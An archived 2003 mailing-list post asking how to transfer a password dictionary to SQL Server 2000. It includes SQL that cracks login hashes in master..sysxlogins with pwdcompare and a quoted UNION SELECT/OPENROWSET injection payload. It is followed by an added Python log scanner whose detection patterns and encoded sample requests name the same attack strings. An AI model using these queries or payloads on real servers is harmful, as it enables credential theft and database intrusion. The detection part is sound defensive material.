Password Testing using SQL Injection

From: Indian Tiger (indiantiger@mailandnews.com)
Date: Tue Jan 28 2003 - 04:40:42 EST


Hi,

I am trying to write a script for a password testing tool over SQL Server
2000.
I am using the master..sysxlogins.password column, in which SQL Server stores
all the passwords, and then we compare this column to a file stored on the
client machine. I am facing a problem comparing two files, one on the client
and another one on the server, so for that I want some way to transfer a file
from the client site to the server site.

First Step: Creating a Table Password-List
create table [Password-List] (word char(40));

Second Step: Inserting Data from Dictionary file to Password Table
bulk insert [Password-List] from 'e:\vipul\Dictionary.txt';

Third Step: Comparing Password-List with SQL Server password table
select [Password-List].word as "Password", master..sysxlogins.name as
"UserName" from master..sysxlogins, [Password-List]
where pwdcompare(rtrim([Password-List].word), master..sysxlogins.password) = 1;

Is there any way to transfer a file from client to server using SQL
injections or something else?

The file (dictionary.txt) which I am comparing is a collection of thousands
of words, which I have generated by some logic.
One way could be to generate one password and then send it to the server using
SQL injection like this:
' UNION SELECT * FROM
OPENROWSET('SQLOLEDB','localhost';'sa';'genpwd','SELECT @@version')--

But it would be a tedious job to send all the passwords one by one. I want to
send the whole file to the server so I can compare all the passwords in a single
query. Please suggest something on this.

Any help or suggestion on this would be highly appreciated.

Thanking You.
Sincerely,

Indian Tiger, CISSP
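
For defenders reviewing web server logs, the following added example (not part of the original message) flags request query strings that carry the statements quoted in this post: OPENROWSET, UNION SELECT, pwdcompare, sysxlogins and bulk insert. The log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the statements quoted in the post above.
INDICATORS = {
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "pwdcompare": re.compile(r"\bpwdcompare\s*\(", re.I),
    "sysxlogins": re.compile(r"\bsysxlogins\b", re.I),
    "bulk_insert": re.compile(r"\bbulk\s+insert\b", re.I),
}

def normalize(value: str) -> str:
    """Undo up to two layers of URL encoding, drop /*...*/ comments, squeeze whitespace."""
    for _ in range(2):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)

def scan(query_string: str) -> list:
    """Return the sorted names of the indicators found in one query string."""
    text = normalize(query_string)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_log(lines):
    """Return (line_number, indicators) for every log line with at least one hit."""
    findings = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 3:
            continue  # malformed line, nothing to inspect
        query = fields[2].partition("?")[2]
        hits = scan(query)
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample lines in an assumed "<client> <method> <request-target>" layout.
SAMPLE_LOG = [
    "192.0.2.10 GET /item.asp?id=42",
    "192.0.2.11 GET /search.asp?q=credit+union+rates",
    "192.0.2.66 GET /item.asp?id=1%27+UNION+SELECT+*+FROM+OPENROWSET(%27SQLOLEDB%27,%27...%27)--",
    "192.0.2.66 GET /item.asp?id=x%2527%2520UnIoN%252F**%252FSELECT%2520name%2520FROM%2520master..sysxlogins--",
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Matching on logs is a detection aid only; the injection itself is closed by parameterised queries in the application and by not letting the web account read master..sysxlogins.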




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:29 EDT